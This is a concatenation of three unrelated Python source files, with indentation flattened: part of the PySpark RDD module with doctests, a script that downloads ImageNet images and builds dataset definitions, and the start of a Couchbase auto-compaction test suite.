def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
>>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
>>> list(rdd2.lookup(('a', 'b'))[0])
['c']
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
return values.collect()
def _to_java_object_rdd(self):
""" Return a JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pyrolite, whenever the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> abs(rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> abs(rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
`"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available here
<http://dx.doi.org/10.1145/2452376.2452456>`_.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(self._jrdd.rdd())
return _load_from_socket(port, self._jrdd_deserializer)
def _prepare_for_python_RDD(sc, command):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
# The broadcast will have same life cycle as created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
# There is a bug in py4j.java_gateway.JavaClass with auto_convert
# https://github.com/bartdag/py4j/issues/161
# TODO: use auto_convert once py4j fix the bug
broadcast_vars = ListConverter().convert(
[x._jbroadcast for x in sc._pickled_broadcast_vars],
sc._gateway._gateway_client)
sc._pickled_broadcast_vars.clear()
env = MapConverter().convert(sc.environment, sc._gateway._gateway_client)
includes = ListConverter().convert(sc._python_includes, sc._gateway._gateway_client)
return pickled_command, broadcast_vars, env, includes
def _wrap_function(sc, func, deserializer, serializer, profiler=None):
assert deserializer, "deserializer should not be empty"
assert serializer, "serializer should not be empty"
command = (func, profiler, deserializer, serializer)
pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command)
return sc._jvm.PythonFunction(bytearray(pickled_command), env, includes, sc.pythonExec,
sc.pythonVer, broadcast_vars, sc._javaAccumulator)
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
wrapped_func = _wrap_function(self.ctx, self.func, self._prev_jrdd_deserializer,
self._jrdd_deserializer, profiler)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(), wrapped_func,
self.preservesPartitioning)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
convert_imagenet_data_set.py
|
import os
import numpy as np
import random
import time
from datetime import datetime as dt
import matplotlib.pyplot as plt
from PIL import Image
import math
from pathlib import Path, PurePath
from urllib import request
import urllib.error
import pandas as pd
from ggutils import get_module_logger
import http.client
from multiprocessing import Process, Manager
import argparse
logger = get_module_logger()
CODE_TRAIN = 0 # data_set_def code for train data
CODE_TEST = 1 # data_set_def code for test data
IMAGENET_WORDS_URL = 'http://image-net.org/archive/words.txt'
ROOT_DIR_PATH = '/var/data/'
WORK_DIR_PATH = os.path.join(ROOT_DIR_PATH, 'work')
DIST_DATA_DIR = os.path.join(ROOT_DIR_PATH, 'imagenet1000-image')
DEFAULT_HTTP_REQUEST_TIMEOUT = 60 # time out after spent 1 minute
'''
1. Downloads Imagenet word from
http://image-net.org/archive/words.txt
to WORK_DIR_PATH
2. Download to data files as:
DIST_DATA_DIR
├── [ID_0] // images that is labeled 0(name: 'tench') with ID_0: 'n01440764'
| ├── image_file_status.csv // csv file with columns 0:url, 1:status
| ├── imagenet_url_list.csv // csv file with columns 0:url(ImageNet url)
| ├── [image file] // image files
...
|
...
├── [ID_999] // images that is labeled 0(name: 'toilet tissue') with ID_0: 'n15075141'
├── data_set_def // data set definition directory
└── train_imagenet1000_classification.csv // data set definition file for training and testing
'''
STATUS_INIT = 0
STATUS_DOWNLOADED = 1
STATUS_ANAVAILABLE = 2
STATUS_FILE_NAME = 'image_file_status.csv'
IMAGENET_URL_LIST_FILE_NAME = 'imagenet_url_list.csv'
CLASS_FILE_PATH = 'imagenet_1000_class.csv'
def is_url(url):
try:
return url.split('://')[0].find('http') >= 0
except Exception:
return False
class ImageNetDownloadStatus():
"""Class to manage how the ImageNet download status is
self.df: DataFrame that contains the ImageNet download status for an ID.
columns=['url', 'status']
url: URL of files to be downloaded
status: STATUS_INIT=0, STATUS_DOWNLOADED=1, STATUS_ANAVAILABLE=2
"""
def __init__(self, id):
self.id = id
self.total_download_size = 0 # int size in byte
dir_path = os.path.join(DIST_DATA_DIR, id)
self.status_file_path = os.path.join(dir_path, STATUS_FILE_NAME)
os.makedirs(dir_path, exist_ok=True)
if os.path.isfile(self.status_file_path):
self.df = pd.read_csv(self.status_file_path)
else:
df_src_array = [['https://www.geek-guild.jp/hoge.jpg', STATUS_ANAVAILABLE]]
self.df = pd.DataFrame(df_src_array, columns=['url', 'status'])
def update_downloaded(self, all_image_url_list):
all_image_url_list = [image_url for image_url in all_image_url_list if not image_url is None]
all_image_url_list = [x.replace('\r', '') for x in all_image_url_list]
if not all_image_url_list is None:
downloaded_file_list = [x.name for x in
list(os.scandir('/var/data/imagenet1000-image/{}/'.format(self.id))) if
(x.name.find(STATUS_FILE_NAME) < 0) and (
x.name.find(IMAGENET_URL_LIST_FILE_NAME) < 0)]
downloaded_url_list = [ImagenetDataSetConverter.file_name_to_image_url(file_name) for file_name in
downloaded_file_list]
downloaded_url_list = [url for url in downloaded_url_list if not url is None]
all_image_url_list.extend(downloaded_url_list)
all_image_url_list = list(set(all_image_url_list))
df_src_array = np.asarray([all_image_url_list, [STATUS_INIT] * len(all_image_url_list)]).T
self.df = pd.DataFrame(df_src_array, columns=['url', 'status'])
self.df['status'] = [STATUS_DOWNLOADED if url in downloaded_url_list else STATUS_INIT for url in
self.df['url']]
self.save()
def save(self):
self.df.to_csv(self.status_file_path, index=False)
def get_downloaded_file_cnt(self):
downloaded_file_cnt = (self.df['status'] == STATUS_DOWNLOADED).sum()
return downloaded_file_cnt
def summary(self):
downloaded_file_cnt = self.get_downloaded_file_cnt()
all_file_cnt = len(self.df)
logger.info('summary of status with id: {}, downloaded_file_cnt: {}, all_file_cnt: {}'.format(self.id, downloaded_file_cnt, all_file_cnt))
def download(self, file_cnt_to_download=2, retry_cnt=10, http_request_timeout=None):
self.summary()
downloaded_file_cnt = self.get_downloaded_file_cnt()
logger.info('downloading from ImageNet with id: {}, downloaded_file_cnt: {}, file_cnt_to_download:{}'.format(self.id, downloaded_file_cnt, file_cnt_to_download))
while (downloaded_file_cnt < file_cnt_to_download) and (retry_cnt > 0):
# choose URL to download
df_to_download = self.df[self.df['status'] == STATUS_INIT]
if df_to_download.empty:
logger.info('No file to download with id:{}'.format(self.id))
return
_index = int(random.random() * len(df_to_download))
df_to_download = df_to_download.iloc[_index]
image_url = df_to_download['url']
try:
image = ImagenetDataSetConverter.download_image(image_url, http_request_timeout=http_request_timeout)
_file_name = ImagenetDataSetConverter.image_url_to_file_name(image_url)
path = os.path.join(DIST_DATA_DIR, self.id)
path = os.path.join(path, _file_name)
logger.info('path to write_image:{}'.format(path))
ImagenetDataSetConverter.write_image(path, image)
# check image by getsize
file_size = os.path.getsize(path)
self.total_download_size += file_size
self.df[self.df['url'] == image_url]['status'] = STATUS_DOWNLOADED
self.save()
downloaded_file_cnt += 1
logger.info('Done download with id:{}, image_url:{}'.format(self.id, image_url))
except (urllib.error.URLError, http.client.InvalidURL) as e:
logger.info(
'Failed to download, and change status to STATUS_ANAVAILABLE with id:{}, url:{}, e:{}'.format(
self.id, image_url, e))
df_to_download['status'] = STATUS_ANAVAILABLE
self.df[self.df['url'] == image_url]['status'] = STATUS_ANAVAILABLE
self.save()
retry_cnt -= 1
except (KeyError, ValueError, urllib.error.HTTPError,
urllib.error.URLError, http.client.IncompleteRead) as e:
logger.info('Failed to download with id:{}, url:{}, e:{}'.format(self.id, image_url, e))
retry_cnt -= 1
except (ConnectionResetError, TimeoutError, ConnectionResetError) as e:
logger.info('Failed to download with id:{}, url:{}, e:{}. sleep and retry another image'.format(
self.id, image_url, e))
time.sleep(3)
retry_cnt -= 1
logger.info(
'while downloading from ImageNet with id: {}, downloaded_file_cnt: {}, file_cnt_to_download:{}'.format(
self.id, downloaded_file_cnt, file_cnt_to_download))
logger.info(
'finished download from ImageNet with id: {} with downloaded_file_cnt:{}, retry_cnt: {}'.format(self.id,
downloaded_file_cnt,
retry_cnt))
class ImagenetDataSetConverter:
def __init__(self, max_threads=1, image_size_per_class=None, http_request_timeout=None):
self.has_to_update_imagenet_url_list = True
self.max_threads = max_threads or 1
self.image_size_per_class = image_size_per_class or 10
self.http_request_timeout = http_request_timeout or DEFAULT_HTTP_REQUEST_TIMEOUT
@staticmethod
def image_url_to_file_name(url):
if not is_url(url): return None
# replace ://
# file_name = url.split('//')[1]
file_name = url.replace('//', '#-+SS+-#')
# replace /
# file_name = file_name.replace('.', '-')
file_name = file_name.replace('/', '#-+S+-#')
return file_name
@staticmethod
def file_name_to_image_url(file_name):
# replace //
image_url = file_name.replace('#-+SS+-#', '//')
# replace /
image_url = image_url.replace('#-+S+-#', '/')
return image_url
def check_image_file_status(self, id_to_check):
status = ImageNetDownloadStatus(id_to_check)
status.update_downloaded(self.get_image_url_list_by_imagenet_id(id_to_check))
logger.info('len of status:{}'.format(len(status.df)))
status.save()
logger.info('id_to_check:{}, len of status:{}'.format(id_to_check, len(status.df)))
return status
def get_image_url_list_by_imagenet_id(self, id):
dir_path = os.path.join(DIST_DATA_DIR, id)
os.makedirs(dir_path, exist_ok=True)
imagenet_url_list_file_path = os.path.join(dir_path, IMAGENET_URL_LIST_FILE_NAME)
_has_to_update_imagenet_url_list = self.has_to_update_imagenet_url_list
if not self.has_to_update_imagenet_url_list:
# check url list that already exists
# os.makedirs(dir_path, exist_ok=True)
if not os.path.isfile(imagenet_url_list_file_path):
# has to update because list does not exist
_has_to_update_imagenet_url_list = True
else:
with open(imagenet_url_list_file_path) as f:
image_url_list = f.read().splitlines()
if _has_to_update_imagenet_url_list:
new_url_list = "http://www.image-net.org/api/text/imagenet.synset.geturls?wnid={}".format(id)
response = request.urlopen(new_url_list, timeout=self.http_request_timeout)
body = response.read().decode('utf8')
image_url_list = body.split('\n')
with open(imagenet_url_list_file_path, 'w') as f:
for item in image_url_list:
f.write("%s\n" % item)
# for image_url in image_url_list:
# logger.debug('id:{}, image_url:{}'.format(id, image_url))
return image_url_list
def download_imagenet_words(self, decode=True):
# all word list
self.all_word_to_id_dict = {}
response = request.urlopen(IMAGENET_WORDS_URL, timeout=self.http_request_timeout)
body = response.read()
if decode == True:
body = body.decode('utf8')
# convert to dict
logger.debug(body)
id_word_list = body.split('\n')
for row in id_word_list:
logger.debug(row)
id, words = row.split('\t')
words = words.replace(', ', ',')
for word in words.split(','):
self.all_word_to_id_dict[word] = id
self.all_word_list = self.all_word_to_id_dict.keys()
# check the name is in Imagenet1000 class name
self.word_to_class_num_dict = {}
self.class_num_to_id_dict = {}
# Imagenet1000 word dict
df_imagenet1000_class = pd.read_csv(CLASS_FILE_PATH)
for index, row in df_imagenet1000_class.iterrows():
class_num = row['class_num']
words = row['class_name']
words = words.replace(', ', ',')
words = words.replace('"', '')
for word in words.split(','):
self.word_to_class_num_dict[word] = class_num
# check that word is linked to imagenet id
if word in self.all_word_list:
self.class_num_to_id_dict[class_num] = self.all_word_to_id_dict[word]
@staticmethod
def download_image(url, decode=False, http_request_timeout=None):
UNAVAILABLE_MESSAGE = 'unavailable'
logger.info('TODO download_image with url:{}'.format(url))
response = request.urlopen(url, timeout=http_request_timeout)
if response.geturl().find(UNAVAILABLE_MESSAGE) >= 0:
raise KeyError('unavailable image url:{}'.format(url))
body = response.read()
if decode == True:
body = body.decode()
return body
@staticmethod
def write_image(path, image):
file = open(path, 'wb')
file.write(image)
file.close()
def summary_threads(self, last_proc_name=None):
logger.info('#+#+# summary_threads #+#+#')
logger.info('#+#+# last_proc_name: {} #+#+#'.format(last_proc_name))
logger.info('#+#+# thread_id list: {} #+#+#'.format(self.thread_dict.keys()))
logger.info('#+#+#+#+#+#+#+#+#+#+#+#+#+#')
def download_image_by_multithreads(self, i, id):
thread_id = '{}_{}'.format(i, id)
self.thread_dict[thread_id] = thread_id
self.summary_threads(last_proc_name='start thread_id:{}'.format(thread_id))
self.thread_serial_num = self.thread_serial_num + 1
if self.thread_serial_num % 1000 == 0:
logger.info(
'Summarize multiprocessing tread with i: {}, id: {}, len of thread_dict:{}, thread_serial_num:{}'.format(
i, id, len(self.thread_dict), self.thread_serial_num))
self.download_image_by_singlethread(i, id)
self.thread_dict.pop(thread_id, None)
self.summary_threads(last_proc_name='finished thread_id:{}'.format(thread_id))
def download_image_by_singlethread(self, i, id):
start_for_id_time = time.time()
finished_ratio = 100.0 * float(i) / float(self.id_size)
df_status = self.check_image_file_status(id)
logger.info(
'########## i: {} / {}, dt: {}, processing with id:{}'.format(
i, self.id_size, dt.now(), id))
# download a file
logger.info('----------')
df_status.download(file_cnt_to_download=self.image_size_per_class, http_request_timeout=self.http_request_timeout)
lap_time = time.time()
spent_hours = (lap_time - self.start_time) / 3600.0
download_speed_mbps = 1e-6 * float(8 * df_status.total_download_size / (lap_time - start_for_id_time))
logger.info('image_size_per_class: {}, finished {:.1f} %, spent_hours: {}, download_speed_mbps: {:.3f}'.format(
self.image_size_per_class, finished_ratio, spent_hours, download_speed_mbps))
def download_imagenet1000(self, shuffle_id=True):
self.download_imagenet_words()
# debug
for k, v in self.class_num_to_id_dict.items():
logger.debug('class_num:{}, id:{}'.format(k, v))
self.id_list = list(self.class_num_to_id_dict.values())
if shuffle_id:
random.shuffle(self.id_list)
self.id_size = len(self.id_list)
self.start_time = time.time()
# download images by singlethread or multithread
self.max_threads = self.max_threads or 1
if self.max_threads > 1:
self.thread_dict = Manager().dict()
self.thread_serial_num = 0
for i, id in enumerate(self.id_list):
if self.max_threads <= 1:
# single thread processing
self.download_image_by_singlethread(i, id)
else:
# multi thread processing
thread_wait_time = 0.01
if len(self.thread_dict) >= self.max_threads:
self.summary_threads('multiprocessing has to be wait for len(self.thread_dict) < self.max_threads')
while len(self.thread_dict) >= self.max_threads:
message = 'multiprocessing waiting for thread_wait_time: {}, tread with i: {}, id: {} starts. thread:{}'.format(
thread_wait_time, i, id, len(self.thread_dict))
logger.info(message)
time.sleep(thread_wait_time)
thread_wait_time = min(self.http_request_timeout, thread_wait_time * 2.0)
p = Process(target=self.download_image_by_multithreads, args=(i, id,), )
p.start()
if self.max_threads > 1:
logger.info('check for all threads finished')
logger.info('existing threads: {}'.format(len(self.thread_dict)))
thread_wait_time = 0.01
while len(self.thread_dict) > 0:
self.summary_threads()
logger.info('waiting for all threads finished for thread_wait_time: {}'.format(thread_wait_time))
time.sleep(thread_wait_time)
thread_wait_time = min(self.http_request_timeout, thread_wait_time * 2.0)
def get_imagenet_id_from_file_path(self, file_path):
imagenet_id = None
if file_path is None: return imagenet_id
try:
imagenet_id = int(file_path.split('/')[-1])
except Exception as e:
logger.info(e)
imagenet_id = None
return imagenet_id
def get_class_num_from_imagenet_id(self, imagenet_id):
class_num = None
if imagenet_id is None: return class_num
try:
class_num = self.imagenet_id_to_class_num_dict(imagenet_id)
except Exception as e:
logger.info(e)
class_num = None
return class_num
def get_data_set_def_path(self):
file_name = 'train_imagenet1000_classification.csv'
data_set_def_path = os.path.join(DIST_DATA_DIR, 'data_set_def')
data_set_def_path = os.path.join(data_set_def_path, file_name)
return data_set_def_path
def get_small_data_set_def_path(self):
file_name = 'train_imagenet1000_classification_small.csv'
small_data_set_def_path = os.path.join(DIST_DATA_DIR, 'data_set_def')
small_data_set_def_path = os.path.join(small_data_set_def_path, file_name)
return small_data_set_def_path
def export_data_set_def(self, df_src_array, test_ratio=0.1):
df_data_set_def = pd.DataFrame(df_src_array, columns=['data_set_id', 'label', 'sub_label', 'test', 'group'])
df_data_set_def['test'] = [CODE_TEST if random.random() < test_ratio else CODE_TRAIN for x in
df_data_set_def['data_set_id']]
# export full data set
_file_path = self.get_data_set_def_path()
os.makedirs(str(Path(_file_path).parent), exist_ok=True)
df_data_set_def.to_csv(_file_path, index=False)
# export small data set (train data 1000, test data 1000*test_ratio)
small_data_iloc = list(range(len(df_data_set_def)))
random.shuffle(small_data_iloc)
small_data_iloc = small_data_iloc[:1000]
df_small_data_set_def = df_data_set_def.iloc[small_data_iloc]
_file_path = self.get_small_data_set_def_path()
os.makedirs(str(Path(_file_path).parent), exist_ok=True)
df_small_data_set_def.to_csv(_file_path, index=False)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='tsp')
parser.add_argument('--image_size_per_class', '-ispc', type=int, default=10,
help='Integer, image size per class (Default: 10)')
parser.add_argument('--max_threads', '-mxthr', type=int, default=1,
help='Integer, max threads (Default: 1, singlethread)')
parser.add_argument('--http_request_timeout', '-hrto', type=int, default=60,
help='Integer, http request timeout (Default: 60 sec)')
args = parser.parse_args()
print('args:{}'.format(args))
converter = ImagenetDataSetConverter(image_size_per_class=args.image_size_per_class, max_threads = args.max_threads, http_request_timeout = args.http_request_timeout)
converter.download_imagenet1000()
logger.info('Done on :{}'.format(dt.now()))
# TODO export_data_set_def
# # prepare data_set_def
# all_label_list = [converter.get_class_num_from_imagenet_id(file_path) for file_path in all_file_list]
# all_data_size = len(all_file_list)
# df_src_array = np.hstack(
# [[all_file_list, all_label_list, all_label_list, [CODE_TRAIN] * all_data_size, ['TRAIN'] * all_data_size]]).T
#
# # add to data_set_def
# converter.export_data_set_def(df_src_array)
|
autocompaction.py
|
import unittest
import logger
import random
import time
import json
import datetime
from threading import Thread, Event
from TestInput import TestInputSingleton
from basetestcase import BaseTestCase
from membase.api.rest_client import RestConnection
from membase.helper.bucket_helper import BucketOperationHelper
from remote.remote_util import RemoteMachineShellConnection
from couchbase_helper.documentgenerator import BlobGenerator
from memcached.helper.data_helper import MemcachedClientHelper, VBucketAwareMemcached
from testconstants import MIN_COMPACTION_THRESHOLD
from testconstants import MAX_COMPACTION_THRESHOLD
class AutoCompactionTests(BaseTestCase):
servers = None
clients = None
log = None
input = None
def setUp(self):
super(AutoCompactionTests, self).setUp()
self.autocompaction_value = self.input.param("autocompaction_value", 0)
self.is_crashed = Event()
self.during_ops = self.input.param("during_ops", None)
self.gen_load = BlobGenerator('compact', 'compact-', self.value_size, start=0, end=self.num_items)
self.gen_update = BlobGenerator('compact', 'compact-', self.value_size, start=0, end=(self.num_items // 2))
@staticmethod
def insert_key(serverInfo, bucket_name, count, size):
rest = RestConnection(serverInfo)
smart = VBucketAwareMemcached(rest, bucket_name)
for i in range(count * 1000):
key = "key_" + str(i)
flag = random.randint(1, 999)
value = {"value" : MemcachedClientHelper.create_value("*", size)}
smart.memcached(key).set(key, 0, 0, json.dumps(value))
def load(self, server, compaction_value, bucket_name, gen):
self.log.info('in the load, wait time is {0}'.format(self.wait_timeout) )
monitor_fragm = self.cluster.async_monitor_db_fragmentation(server, compaction_value, bucket_name)
end_time = time.time() + self.wait_timeout * 5
# generate load until fragmentation reached
while monitor_fragm.state != "FINISHED":
if self.is_crashed.is_set():
self.cluster.shutdown(force=True)
return
if end_time < time.time():
self.err = "Fragmentation level is not reached in %s sec" % self.wait_timeout * 5
return
# update docs to create fragmentation
try:
self._load_all_buckets(server, gen, "update", 0)
except Exception as ex:
self.is_crashed.set()
self.log.error("Load cannot be performed: %s" % str(ex))
monitor_fragm.result()
def test_database_fragmentation(self):
self.log.info('start test_database_fragmentation')
self.err = None
BucketOperationHelper.delete_all_buckets_or_assert(self.servers, self)
percent_threshold = self.autocompaction_value
bucket_name = "default"
MAX_RUN = 100
item_size = 1024
update_item_size = item_size * ((float(100 - percent_threshold)) // 100)
serverInfo = self.servers[0]
self.log.info(serverInfo)
rest = RestConnection(serverInfo)
remote_client = RemoteMachineShellConnection(serverInfo)
output, rq_content, header = rest.set_auto_compaction("false", dbFragmentThresholdPercentage=percent_threshold, viewFragmntThresholdPercentage=None)
if not output and (percent_threshold <= MIN_COMPACTION_THRESHOLD or percent_threshold >= MAX_COMPACTION_THRESHOLD):
self.assertFalse(output, "it should be impossible to set compaction value = {0}%".format(percent_threshold))
import json
self.assertTrue("errors" in json.loads(rq_content), "Error is not present in response")
self.assertTrue(str(json.loads(rq_content)["errors"]).find("Allowed range is 2 - 100") > -1, \
"Error 'Allowed range is 2 - 100' expected, but was '{0}'".format(str(json.loads(rq_content)["errors"])))
self.log.info("Response contains error = '%(errors)s' as expected" % json.loads(rq_content))
elif (output and percent_threshold >= MIN_COMPACTION_THRESHOLD
and percent_threshold <= MAX_RUN):
node_ram_ratio = BucketOperationHelper.base_bucket_ratio(TestInputSingleton.input.servers)
info = rest.get_nodes_self()
available_ram = info.memoryQuota * (node_ram_ratio) // 2
items = (int(available_ram * 1000) // 2) // item_size
print("ITEMS =============%s" % items)
rest.create_bucket(bucket=bucket_name, ramQuotaMB=int(available_ram),
replicaNumber=1, proxyPort=11211)
BucketOperationHelper.wait_for_memcached(serverInfo, bucket_name)
BucketOperationHelper.wait_for_vbuckets_ready_state(serverInfo, bucket_name)
self.log.info("******start to load {0}K keys with {1} bytes/key".format(items, item_size))
#self.insert_key(serverInfo, bucket_name, items, item_size)
generator = BlobGenerator('compact', 'compact-', int(item_size), start=0, end=(items * 1000))
self._load_all_buckets(self.master, generator, "create", 0, 1, batch_size=1000)
self.log.info("sleep 10 seconds before the next run")
time.sleep(10)
self.log.info("********start to update {0}K keys with smaller value {1} bytes/key".format(items,
int(update_item_size)))
generator_update = BlobGenerator('compact', 'compact-', int(update_item_size), start=0, end=(items * 1000))
if self.during_ops:
if self.during_ops == "change_port":
self.change_port(new_port=self.input.param("new_port", "9090"))
self.master.port = self.input.param("new_port", "9090")
elif self.during_ops == "change_password":
old_pass = self.master.rest_password
self.change_password(new_password=self.input.param("new_password", "new_pass"))
self.master.rest_password = self.input.param("new_password", "new_pass")
rest = RestConnection(self.master)
insert_thread = Thread(target=self.load,
name="insert",
args=(self.master, self.autocompaction_value,
self.default_bucket_name, generator_update))
try:
self.log.info('starting the load thread')
insert_thread.start()
compact_run = remote_client.wait_till_compaction_end(rest, bucket_name,
timeout_in_seconds=(self.wait_timeout * 10))
if not compact_run:
self.fail("auto compaction does not run")
elif compact_run:
self.log.info("auto compaction run successfully")
except Exception as ex:
self.log.info("exception in auto compaction")
if self.during_ops:
if self.during_ops == "change_password":
self.change_password(new_password=old_pass)
elif self.during_ops == "change_port":
self.change_port(new_port='8091',
current_port=self.input.param("new_port", "9090"))
if str(ex).find("enospc") != -1:
self.is_crashed.set()
self.log.error("Disk is out of space, unable to load more data")
insert_thread._Thread__stop()
else:
insert_thread._Thread__stop()
raise ex
else:
insert_thread.join()
if self.err is not None:
self.fail(self.err)
else:
self.log.error("Unknown error")
if self.during_ops:
if self.during_ops == "change_password":
self.change_password(new_password=old_pass)
elif self.during_ops == "change_port":
self.change_port(new_port='8091',
current_port=self.input.param("new_port", "9090"))
def _viewFragmentationThreshold(self):
for serverInfo in self.servers:
self.log.info(serverInfo)
rest = RestConnection(serverInfo)
rest.set_auto_compaction(dbFragmentThresholdPercentage=80, viewFragmntThresholdPercentage=80)
def rebalance_in_with_DB_compaction(self):
self.disable_compaction()
self._load_all_buckets(self.master, self.gen_load, "create", 0, 1)
self._monitor_DB_fragmentation()
servs_in = self.servers[self.nodes_init:self.nodes_in + 1]
rebalance = self.cluster.async_rebalance([self.master], servs_in, [])
self.sleep(5)
